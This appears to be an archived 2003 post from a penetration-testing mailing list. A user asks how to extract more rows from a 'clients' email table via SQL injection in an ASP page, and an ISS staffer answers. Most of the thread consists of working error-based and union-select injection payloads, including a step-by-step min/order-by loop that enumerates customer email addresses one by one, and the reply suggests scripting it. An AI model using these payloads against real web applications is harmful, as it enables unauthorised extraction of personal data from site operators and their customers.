RE: SQL injection - get more values

From: Brass, Phil (ISS Atlanta) (PBrass@iss.net)
Date: 02/12/03

Next message: X-Force: "ISS Security Alert Summary AS03-07"

Previous message: X-Force: "ISS Security Alert Summary AS03-06"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Wed, 12 Feb 2003 14:05:02 -0500
From: "Brass, Phil (ISS Atlanta)" <PBrass@iss.net>
To: "Daniel Savi" <dss@brturbo.com>, <pen-test@securityfocus.com>

I believe the solution you're looking for is the old min-where-order-by
trick.

> ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b
'

Try this:
> ' %2b convert(int, (SELECT min(email) FROM clients WHERE email > 'a'
order by 1)) %2b '

After you get the first value (say it's anon@isp.com), you throw it into
the where clause:

> ' %2b convert(int, (SELECT min(email) FROM clients WHERE email >
'anon@isp.com' order by 1)) %2b '

You get the next value, say it's axon@isp.com, then you do the next
query:

> ' %2b convert(int, (SELECT min(email) FROM clients WHERE email >
'axon@isp.com' order by 1)) %2b '

And so on, until you don't get an error. Of course, for most gratifying
results you write a little program that does this for you.

Phil

> -----Original Message-----
> From: Daniel Savi [mailto:dss@brturbo.com]
> Sent: Wednesday, February 12, 2003 12:49 PM
> To: pen-test@securityfocus.com
> Subject: SQL injection - get more values
>
>
>
>
> Hi :)
>
> i'm trying to get some info from clients table and email field....
>
> i try this param into gubpage.asp?=...
> ') union select sum(email) from clients--
> and got error about all queries needed...so, i tryed to solve with
> ') union select sum(email),1,1,1.... from clients--
> until i get: operand type clash: text is incompatible with int
>
> i found this answer into this forum (thanks :)), was:
> ' %2b convert(int, (SELECT email FROM clients WHERE email >
> 'a')) %2b '
>
> i got this:
> Syntax error converting the varchar value 'anon@isp.com' to a
> column of
> data type int
>
> Now, my problem: How can i get other e-mail from table
> knowing one valid
> value?
>
> i try this
> ' %2b convert(int, (SELECT email FROM clients WHERE email
> > 'anon@isp.com')) %2b '
> but no success
>
> i think i can use NOT iN, but not sure how to use with convert...
>
> Any tip are welcome!
>
> Thanks
>
> --------------------------------------------------------------
> --------------
> This list is provided by the SecurityFocus Security
> Intelligence Alert (SIA) Service. For more information on
> SecurityFocus' SIA service which automatically alerts you to
> the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: X-Force: "ISS Security Alert Summary AS03-07"
Previous message: X-Force: "ISS Security Alert Summary AS03-06"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]